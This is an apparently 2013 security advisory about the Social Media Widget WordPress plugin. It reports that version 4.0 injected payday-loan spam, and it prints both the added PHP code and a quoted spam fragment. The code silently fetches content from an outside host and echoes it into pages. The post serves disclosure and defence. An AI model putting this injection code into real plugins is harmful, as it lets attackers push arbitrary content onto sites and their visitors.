WordPress Plugin Social Media Widget Hiding Spam – Remove it now

If you are using the plugin Social Media Widget (social-media-widget), make sure to remove it asap from your web site. We discovered it is being used to inject spam into web sites and the plugin was just removed from the WordPress Plugin repository.

This is a very popular plugin with more than 900,000 downloads. So it is likely affecting a lot of web sites.

Screen Shot 2013-04-09 at 11.03.12 AM

Technical details

The plugin has a hidden call to this URL: httx://i.aaur.net/i.php, which is used to inject “Pay Day Loan” spam into the web sites running the plugin. This is how it looks like in the browser:

function nemoViewState( ){
var a=0,m,v,t,z,x=new …
<p class="nemonn"><a href="httx://paydaypam.co. uk/" title="Payday Loan">payday loans

The malicious code was added only 12 days ago when they launched the version 4.0 of the plugin. So we are recommending that everyone removes that plugin asap until we have more information. Our free sitecheck scanner does identify if your site has been injected with this type of spam.

This is the full code that was added to the plugin:

471 $smw_url = "http://i.aaur.net/i.php";
472 if(!function_exists("smw_get")){
473 function smw_get($f) {
474 $response = wp_remote_get( $f );
475 if( is_wp_error( $response ) ) {
476 function smw_get_body($f) {
477 $ch = @curl_init();
478 @curl_setopt($ch, CURLOPT_URL, $f);
479 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480 $output = @curl_exec($ch);
481 @curl_close($ch);
482 return $output;
483 }
484 echo smw_get_body($f);
485 } else {
486 echo $response["body"];
487 }
488 }
489 smw_get($smw_url);
490 }

We will post more details as we investigate this further.

Read more: WordPress Plugin Social Media Widget Hiding Spam – Remove it now

Story added 9. April 2013, content source with full text you can find at link above.